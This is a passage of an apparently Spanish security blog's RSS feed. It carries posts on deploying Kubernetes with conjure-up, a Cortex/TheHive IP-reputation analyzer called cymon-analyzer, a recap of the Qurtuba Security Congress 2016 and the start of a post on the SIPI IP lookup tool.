symbol&amp;quot;; font-size: 20px; white-space: pre-wrap;&quot;&gt;entajas&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;span style=&quot;color: rgba(0 , 0 , 0 , 0.75); font-family: &amp;quot;source serif pro&amp;quot; , serif; font-size: 20px; white-space: pre-wrap;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;color: rgba(0 , 0 , 0 , 0.75); font-family: &amp;quot;source serif pro&amp;quot; , serif; font-size: 20px; white-space: pre-wrap;&quot;&gt;No todo iban a ser limitaciones, para el área DevOps y el ciclo de CI/CD Integración continua) todo son ventajas:&lt;/span&gt;&lt;br /&gt;&lt;ol&gt;&lt;li&gt;Montar un cluster Kubernetes rápidamente totalmente operativo.&lt;/li&gt;&lt;li&gt;Desplegar Jenkins (integración continua) y Sonar (Auditoria de Código)&lt;/li&gt;&lt;li&gt;Y Probar las aplicaciones en un entorno igual al de producción en los principales Proveedores de Cloud.&lt;/li&gt;&lt;/ol&gt;Happy Hacking !!! DevOps ! :)</description><link>http://www.seguridadparatodos.es/2018/05/conjure-up-juju-magic-linux-container.html</link><author>noreply@blogger.com (Julian J. Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://4.bp.blogspot.com/-VDnQ75J1TrE/W4Z3EhR--dI/AAAAAAAAfFM/EiNHUZKtgLs5DDDh_7g65ToKm26AKY2zACLcBGAs/s72-c/conjure_up_320x390.png" height="72" width="72"/></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-6432310068808515729</guid><pubDate>Thu, 14 Sep 2017 10:10:00 +0000</pubDate><atom:updated>2019-10-01T09:07:52.067+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">analyzer</category><category domain="http://www.blogger.com/atom/ns#">Computer Security</category><category domain="http://www.blogger.com/atom/ns#">cortex</category><category domain="http://www.blogger.com/atom/ns#">cymon</category><category domain="http://www.blogger.com/atom/ns#">engine</category><category domain="http://www.blogger.com/atom/ns#">Handler</category><category domain="http://www.blogger.com/atom/ns#">Incident</category><category domain="http://www.blogger.com/atom/ns#">IT Security</category><category domain="http://www.blogger.com/atom/ns#">ST2Labs</category><category domain="http://www.blogger.com/atom/ns#">thehive</category><title>[cymon-analyzer] | Modulo de Análisis Reputación IP en Cymon.io para Cortex Engine | theHive-project</title><description>&lt;table cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;float: left; margin-right: 1em; text-align: left;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://1.bp.blogspot.com/-kZ6n4TsSZ8M/WbpPZgBjirI/AAAAAAAAefc/ZBbTpyBlC7UwHm1BT1OGusI5hv_eO7xVQCLcBGAs/s1600/TheHive%2BProject%2B-%2BHead.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;407&quot; data-original-width=&quot;1049&quot; src=&quot;https://1.bp.blogspot.com/-kZ6n4TsSZ8M/WbpPZgBjirI/AAAAAAAAefc/ZBbTpyBlC7UwHm1BT1OGusI5hv_eO7xVQCLcBGAs/s1600/TheHive%2BProject%2B-%2BHead.png&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://1.bp.blogspot.com/-kZ6n4TsSZ8M/WbpPZgBjirI/AAAAAAAAefc/ZBbTpyBlC7UwHm1BT1OGusI5hv_eO7xVQCLcBGAs/s1600/TheHive%2BProject%2B-%2BHead.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Cuando eres un Tier1/L2 SOC Security Analyst disponer de la mejor herramienta para la toma de decisiones es fundamental con objeto de &quot;responde&quot; ante una Amenaza de la mejor forma y lo más rápido posible.&lt;br /&gt;&lt;br /&gt;En mi paso como &quot;Manager&quot; del antiguo equipo del&amp;nbsp;&lt;b&gt;Centro de Inteligencia y Operaciones de Seguridad, denominado SSIC&lt;/b&gt; por la siglas (SVT Security Intelligence &amp;amp; Operations Center), se indicaba que la prioridad era conseguir herramientas que permitan a nuestros analistas L1 / L2 disponer de la mejor información en el menor tiempo posible, permitiendo decisiones / acciones inmediatas.&lt;br /&gt;&lt;br /&gt;Es un placer compartir con la comunidad el desarrollo de un módulo para análisis de direcciones IP &quot;sospechosas&quot;, os presento, &lt;b&gt;&lt;a href=&quot;https://github.com/ST2Labs/cymon-analyzer&quot; target=&quot;_blank&quot;&gt;cymon-analyzer&lt;/a&gt;&lt;/b&gt;, es un plugins (analizador) desarrollado para el motor &lt;a href=&quot;https://github.com/CERT-BDF/CortexDocs&quot; target=&quot;_blank&quot;&gt;Cortex&lt;/a&gt; del proyecto [&lt;a href=&quot;http://thehive-project.org/&quot; target=&quot;_blank&quot;&gt;TheHive-Project&lt;/a&gt;]&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Descripción&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;b&gt;cymon-analyzer&lt;/b&gt; permite analizar información sobre la reputación IP en un &quot;Incidente / Alerta&quot; de seguridad en el servicio cymon.io (Open Threat Intelligence) de forma automática, para ello se utiliza la API que nos proporciona este servicio.&lt;br /&gt;&lt;br /&gt;He desarrollado un modulo para &lt;a href=&quot;https://github.com/CERT-BDF/CortexDocs&quot;&gt;Cortex&lt;/a&gt;, que permite analizar rápidamente y comprobar si la IP detectada como &quot;potencialmente peligrosa&quot; (observable / evidencia) esta listada en &quot;lista negras&quot; por mala reputación [Malware, Spam, Phishing, blacklist, Actividad Maliciosa, etc].&lt;br /&gt;&lt;br /&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://4.bp.blogspot.com/-e4uHr5RjXL0/WbpRqbG74iI/AAAAAAAAefo/uRJrjKvdkDYgvUkFOEDUMy9Yn1OjYD1XwCLcBGAs/s1600/TheHive%2B-cymon-analyzer.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;727&quot; data-original-width=&quot;1423&quot; height=&quot;324&quot; src=&quot;https://4.bp.blogspot.com/-e4uHr5RjXL0/WbpRqbG74iI/AAAAAAAAefo/uRJrjKvdkDYgvUkFOEDUMy9Yn1OjYD1XwCLcBGAs/s640/TheHive%2B-cymon-analyzer.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;cymon-analyzer | Working in TheHive Platform | Captura pantalla del analyzer en funcionamiento.&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;De forma automática, un &lt;b&gt;analista&lt;/b&gt; puede comprobar y obtener información desde múltiples IP / Observables con un solo click. Se puede ejecutar el Analyzer, y el motor [Cortex] a través del Analizador se encarga de consultar &quot;IP por IP&quot; al servicio cymon.io devolviendo la información en forma de etiqueta e Informe.&lt;br /&gt;&lt;br /&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://2.bp.blogspot.com/-kp4V3kAuRxA/WbpTK1kkeCI/AAAAAAAAef0/XXvS7jATvHEAsCLly5CxY_2rzms0aGQEgCLcBGAs/s1600/TheHive%2B-%2BReport.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;751&quot; data-original-width=&quot;1391&quot; height=&quot;344&quot; src=&quot;https://2.bp.blogspot.com/-kp4V3kAuRxA/WbpTK1kkeCI/AAAAAAAAef0/XXvS7jATvHEAsCLly5CxY_2rzms0aGQEgCLcBGAs/s640/TheHive%2B-%2BReport.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;Full Report | Informe resultante cymon-analyzers&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;TheHive-Project es una plataforma de gestión de Incidentes de Seguridad (&lt;strike&gt;relativamente nueva&lt;/strike&gt;) consolidada, que proporciona la herramienta que un SOC/CERT necesita.&lt;br /&gt;&lt;br /&gt;Es una herramienta desarrollada por expertos en Seguridad para equipos de Seguridad. Sus capacidades de integración son espectaculares, no solo gracias a la comunidad que cada día desarrolla más &quot;Analyzer&quot; incrementando el valor de la herramienta y sus capacidades, sino también debido a la capacidad de integración que proporciona la API de la plataforma.&lt;br /&gt;&lt;br /&gt;Si estáis interesados, podéis conseguir el analyzer en mi cuenta&amp;nbsp; personal de GitHUB | &lt;a href=&quot;https://github.com/ST2Labs&quot; target=&quot;_blank&quot;&gt;ST2Labs&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Repositorio: &lt;a href=&quot;https://github.com/ST2Labs/cymon-analyzer&quot; target=&quot;_blank&quot;&gt;cymon-analyzer&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Enlaces de&amp;nbsp;Interés&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;a href=&quot;http://thehive-project.org/&quot;&gt;http://thehive-project.org/&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://github.com/CERT-BDF/Cortex-Analyzers&quot;&gt;https://github.com/CERT-BDF/Cortex-Analyzers&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.svtcloud.com/&quot;&gt;www.svtcloud.com&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;ST2Labs&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;</description><link>http://www.seguridadparatodos.es/2017/09/cymon-analyzer-cortex-thehive.html</link><author>noreply@blogger.com (Julian J. Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://1.bp.blogspot.com/-kZ6n4TsSZ8M/WbpPZgBjirI/AAAAAAAAefc/ZBbTpyBlC7UwHm1BT1OGusI5hv_eO7xVQCLcBGAs/s72-c/TheHive%2BProject%2B-%2BHead.png" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-6887957954218224464</guid><pubDate>Mon, 19 Sep 2016 19:49:00 +0000</pubDate><atom:updated>2016-09-20T08:07:20.325+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Q2k16</category><title>Qurtuba Security Congress 2016 </title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;georgia&amp;quot; , &amp;quot;times new roman&amp;quot; , serif;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://4.bp.blogspot.com/--FeBWDhdbfE/V9-7Izyn4RI/AAAAAAAACB8/RvysXrbbS649Q5EvIluIHiclUHefU7YgwCLcB/s1600/image3344.png&quot; /&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt; Grandes profesionales de toda España unidos con los mismos objetivos: concienciar y enseñar.&lt;br /&gt;&lt;br /&gt;Durante los días 16 y 17 de septiembre ha tenido lugar Qurtuba. Congreso de seguridad celebrado en la ciudad de Córdoba que atrae a centenares de interesados en ciberseguridad.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Entre los organizadores encontramos a Miguel Ángel Arroyo y Edu Sánchez. Dos profesionales dedicados a la seguridad y la enseñanza cuya pasión es aprender y compartir. Así nos lo trasmiten en cada evento de seguridad organizado por ellos mismos o a los que asisten, no solo en Córdoba, sino en toda España. Como fue el celebrado el día previo a Qurtuba, &quot;Hack&amp;amp;Beers&quot;. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Un total de 13 ponentes y diversos talleres se han desarrollado durante estos días. &lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;h2&gt; Introducción&lt;/h2&gt;A continuación, un breve resumen de las ponencias más destacadas.&lt;br /&gt;&lt;br /&gt; &lt;b&gt;Josep Bardallo, executive manager en Svt Cloud. &lt;br /&gt;  &lt;i&gt;“Seguridad en entornos hospitalarios &amp;amp; iOT”.&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;br /&gt; Nos destaca la gran cantidad de iOT utilizados en hospitales e instituciones sanitarias pensados para salvar vidas y avanzar en resultados de pacientes, cuya labor cumplen muy bien, pero… ¿Qué pasa con la seguridad de estos aparatos?... Los fabricantes se olvidan de ella, olvidando que todos están conectados de una manera u otra a Internet y, por lo tanto, disponibles para los cibercriminales.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; &lt;a href=&quot;https://1.bp.blogspot.com/-IMUtXkey6Uw/V9_DJIiqkwI/AAAAAAAACCM/nu8EHqOCnOUeXPZE0r3uyzw_UJuaWStHwCLcB/s1600/IMG_9756.JPG&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://1.bp.blogspot.com/-IMUtXkey6Uw/V9_DJIiqkwI/AAAAAAAACCM/nu8EHqOCnOUeXPZE0r3uyzw_UJuaWStHwCLcB/s400/IMG_9756.JPG&quot; /&gt;&lt;/a&gt;&lt;br /&gt; &lt;br /&gt; &lt;br /&gt;  Con una simple búsqueda de cámaras de vigilancia a través de &lt;a href=&quot;https://www.shodan.io/&quot;&gt;Shodan&lt;/a&gt; nos “cuela” en centros de educación y centros penitenciarios entre otros lugares, donde han olvidado, una vez más la seguridad dejando la configuración por defecto del fabricante.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Daniel Medianero “Marketing Service Manager” en s21sec.&lt;/b&gt;&lt;br /&gt;&lt;b&gt;  “Hackeando las emociones: una nueva visión de la ingeniería so&lt;/b&gt;&lt;b&gt;ial”.&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;https://3.bp.blogspot.com/-cTJMcb7kmOo/V9_V255DOpI/AAAAAAAACCc/mp1V3WGXJbc45RAIxDEbahhkTfZVMvKoQCLcB/s1600/IMG_9802.JPG&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://3.bp.blogspot.com/-cTJMcb7kmOo/V9_V255DOpI/AAAAAAAACCc/mp1V3WGXJbc45RAIxDEbahhkTfZVMvKoQCLcB/s400/IMG_9802.JPG&quot; /&gt;&lt;/a&gt; &lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;Daniel nos invita a analizar el comportamiento de los seres humanos, de  nosotros mismos, la importancia del lenguaje no verbal y de toda la  información que nos trasmite, que, en muchas ocasiones, por  desconocimiento, no le prestamos la atención que deberíamos.&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt; &lt;br /&gt; &lt;a href=&quot;https://2.bp.blogspot.com/-ac4zZ_Ps-CQ/V9_V7iei9ZI/AAAAAAAACCg/rzlHX2wgUnI6Tw7Snwx8KWJdFxFd7BUPwCLcB/s1600/IMG_9793.JPG&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://2.bp.blogspot.com/-ac4zZ_Ps-CQ/V9_V7iei9ZI/AAAAAAAACCg/rzlHX2wgUnI6Tw7Snwx8KWJdFxFd7BUPwCLcB/s400/IMG_9793.JPG&quot; /&gt;&lt;/a&gt; &lt;br /&gt; &lt;br /&gt; &lt;br /&gt; &lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;Con ejemplos de la vida cotidiana, o televisivos, nos enseña desde quién  está intentando establecer un simple “coqueteo” a quién pretende dejar  claro que es “su territorio”, su poder en ese momento o sobre la  situación. &lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;Y lo que es más importante, la fuerza que  tienen estas técnicas para el atacante, siendo utilizadas para elegir a  la víctima que considera más vulnerable o fácil de &quot;manejar&quot;.&amp;nbsp;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;br /&gt;   &lt;br /&gt; Del último de los ponentes que os hablaremos es &lt;b&gt;Francisco J Rodríguez, miembro de INCIBE&lt;/b&gt; con su conferencia &lt;b&gt;&lt;i&gt;“Is it a game or is it real?” &lt;/i&gt;&lt;/b&gt;&lt;br /&gt;  &lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;https://1.bp.blogspot.com/-T7ScQQMmXnU/V9_Y7qnspgI/AAAAAAAACCo/VBtPrs0XCBIjY0auETeQToaaVlhfChBiwCLcB/s1600/IMG_9951.JPG&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://1.bp.blogspot.com/-T7ScQQMmXnU/V9_Y7qnspgI/AAAAAAAACCo/VBtPrs0XCBIjY0auETeQToaaVlhfChBiwCLcB/s400/IMG_9951.JPG&quot; /&gt;&lt;/a&gt; &lt;br /&gt; &lt;br /&gt; &lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;Al igual que Josep Bardallo, Francisco Rodríguez nos trasmite como iOT  se encuentra cada vez más extendido y más desarrollado, pero, no más  seguro.&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;Es decir, cada vez son más los aparatos dentro de un hogar que se  encuentran conectados, expuestos (teléfono, tablet, luces, frigorífico…  ¡hasta el WC!)&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt; &lt;br /&gt; &lt;a href=&quot;https://4.bp.blogspot.com/-lM2hgT0gjVI/V9_Zek1FkbI/AAAAAAAACC0/rwNTeP6ltXA5MZEmlLxVTFtcOIhMGRcZACLcB/s1600/IMG_9962.JPG&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://4.bp.blogspot.com/-lM2hgT0gjVI/V9_Zek1FkbI/AAAAAAAACC0/rwNTeP6ltXA5MZEmlLxVTFtcOIhMGRcZACLcB/s400/IMG_9962.JPG&quot; /&gt;&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;  &lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;¿De verdad creemos que estamos a salvo? Grandes empresas se han visto  afectadas por ataques de cibercriminales ¿Qué nos hace pensar que los  siguientes no podemos ser nosotros?&lt;br /&gt; Nos hace reflexionar sobre si  esto es necesario ya que, por ganar en comodidad, exponemos nuestra  seguridad, nuestra vida privada.&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;Francisco nos muestra como desde INCIBE estudian a los cibercriminales a  través de HoneyPot, sistemas con vulnerabilidades expuestos en la red  para obtener toda la información posible de cómo actúa el cibercriminal y  poder combatirlo&lt;br /&gt; &lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://1.bp.blogspot.com/-e7upB7DZ3Ys/V9_Zei3yJfI/AAAAAAAACCw/MlciDnKEwd0dGOfuBxBHpEm8GEOs9JaxQCLcB/s1600/IMG_9978.JPG&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://1.bp.blogspot.com/-e7upB7DZ3Ys/V9_Zei3yJfI/AAAAAAAACCw/MlciDnKEwd0dGOfuBxBHpEm8GEOs9JaxQCLcB/s400/IMG_9978.JPG&quot; /&gt;&lt;/a&gt; &lt;br /&gt; &lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;br /&gt; &lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt; Entre estos ponentes, se encuentran muchos otros, los cuales podéis ver en la  &lt;a href=&quot;https://qurtuba.es/2016/programa-2016-qurtucon/&quot;&gt;programación&lt;/a&gt; &lt;br /&gt;  En el segundo día del congreso, se realizaron talleres sobre diferentes temas de concienciación, ingeniería social, análisis forense, etc&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt; Cada uno de ellos con diferentes niveles destinados a todo el público que se está iniciando en estos caminos o el que ya lleva unos pasitos.&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt; Además de conferencias y talleres, durante el congreso ha tenido lugar un &lt;a href=&quot;https://qurtuba.es/2016/retos/ctf/&quot;&gt;CTF&lt;/a&gt;, &quot;Capture The Flag&quot; proporcionándole a los ganadores la entrada a cybercamp 2016.&amp;nbsp;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt; Sin duda alguna, es uno de los mejores congresos de seguridad informática en la ciudad de Córdoba donde desvirtualizas a profesionales y adquieres nuevos conocimientos.&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt; A través de twitter pueden ver toda la actividad producida por este evento con el hastag #Q2k16 .&lt;br /&gt; Si este año te lo has perdido, no dejes que se te escape la siguiente edición en @qutubacon nos mantiene informados. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;  &lt;br /&gt;  &lt;br /&gt; Lucía Expósito Ortega &lt;br /&gt; &lt;a href=&quot;https://4.bp.blogspot.com/-Yc4QEvTcIT4/V-BArvlLzgI/AAAAAAAACDI/UKgQ8joeVPQAXhPYEr1x7XidZAjst88qwCLcB/s1600/t.PNG&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://4.bp.blogspot.com/-Yc4QEvTcIT4/V-BArvlLzgI/AAAAAAAACDI/UKgQ8joeVPQAXhPYEr1x7XidZAjst88qwCLcB/s1600/t.PNG&quot; /&gt;&lt;/a&gt;@LuciaExpositoOrt&lt;br /&gt;  &lt;br /&gt;  &lt;br /&gt;  &lt;br /&gt; &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;https://4.bp.blogspot.com/-6a8KRhxf27A/V-BALUHfNHI/AAAAAAAACDE/FOZMqPHjA_oEpKseDmr9si2oCZQWyRbcwCLcB/s1600/t.PNG&quot;&gt;&lt;/a&gt;&lt;br /&gt;   &lt;br /&gt; &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; &lt;br /&gt; &lt;br /&gt; &lt;br /&gt;   &lt;br /&gt;   &lt;br /&gt;   &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;  &lt;br /&gt;&lt;br /&gt;  &lt;br /&gt;&lt;br /&gt;  &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;  &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;  &lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;</description><link>http://www.seguridadparatodos.es/2016/09/qurtuba-security-congress-2016.html</link><author>noreply@blogger.com (Unknown)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://4.bp.blogspot.com/--FeBWDhdbfE/V9-7Izyn4RI/AAAAAAAACB8/RvysXrbbS649Q5EvIluIHiclUHefU7YgwCLcB/s72-c/image3344.png" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-9077015483171955156</guid><pubDate>Fri, 01 Apr 2016 14:36:00 +0000</pubDate><atom:updated>2016-05-10T00:57:00.622+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Blacklist</category><category domain="http://www.blogger.com/atom/ns#">CyberSOC</category><category domain="http://www.blogger.com/atom/ns#">Data</category><category domain="http://www.blogger.com/atom/ns#">Info</category><category domain="http://www.blogger.com/atom/ns#">Intelligence</category><category domain="http://www.blogger.com/atom/ns#">IP</category><category domain="http://www.blogger.com/atom/ns#">IT Security</category><category domain="http://www.blogger.com/atom/ns#">Malware</category><category domain="http://www.blogger.com/atom/ns#">MSOC</category><category domain="http://www.blogger.com/atom/ns#">OSINT</category><category domain="http://www.blogger.com/atom/ns#">Reputation</category><category domain="http://www.blogger.com/atom/ns#">ST2Labs</category><category domain="http://www.blogger.com/atom/ns#">SVTCloud</category><category domain="http://www.blogger.com/atom/ns#">Threat</category><title>[SIPI] Simple IP Information Tool is out</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://2.bp.blogspot.com/-1j617JgrY10/Vv6FX7c1sjI/AAAAAAAAd6c/UTtld4lMOL0GF8IQ3nCA95Ip2E9JuhEXg/s1600/ST2_SIPI_Head.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://2.bp.blogspot.com/-1j617JgrY10/Vv6FX7c1sjI/AAAAAAAAd6c/UTtld4lMOL0GF8IQ3nCA95Ip2E9JuhEXg/s1600/ST2_SIPI_Head.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Cuando se reciben miles de ataques desde Internet, es necesario disponer de información que permita tomar decisiones de una forma ágil y rápida. En un CERT/SOC, es decir en un centro de operaciones de ciberseguridad, es primordial disponer de información sobre una posible amenaza para ejecutar acciones y/o medidas de prevención, protección y defensa.&lt;/div&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Introducción&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Por ejemplo, se detecta un &lt;b&gt;tcp_scan&lt;/b&gt; en el IPS / Cortafuegos:&lt;br /&gt;&lt;br /&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://4.bp.blogspot.com/-eHq2xDeKdh8/Vv4dY8Yej2I/AAAAAAAAd5g/kYIprrdsHVkiC-vW0FV-XEwK8xlzTc3jA/s1600/ST2_tcp_scan_fortinet.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;74&quot; src=&quot;https://4.bp.blogspot.com/-eHq2xDeKdh8/Vv4dY8Yej2I/AAAAAAAAd5g/kYIprrdsHVkiC-vW0FV-XEwK8xlzTc3jA/s640/ST2_tcp_scan_fortinet.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;FortiAnalyzer - Event Manager - 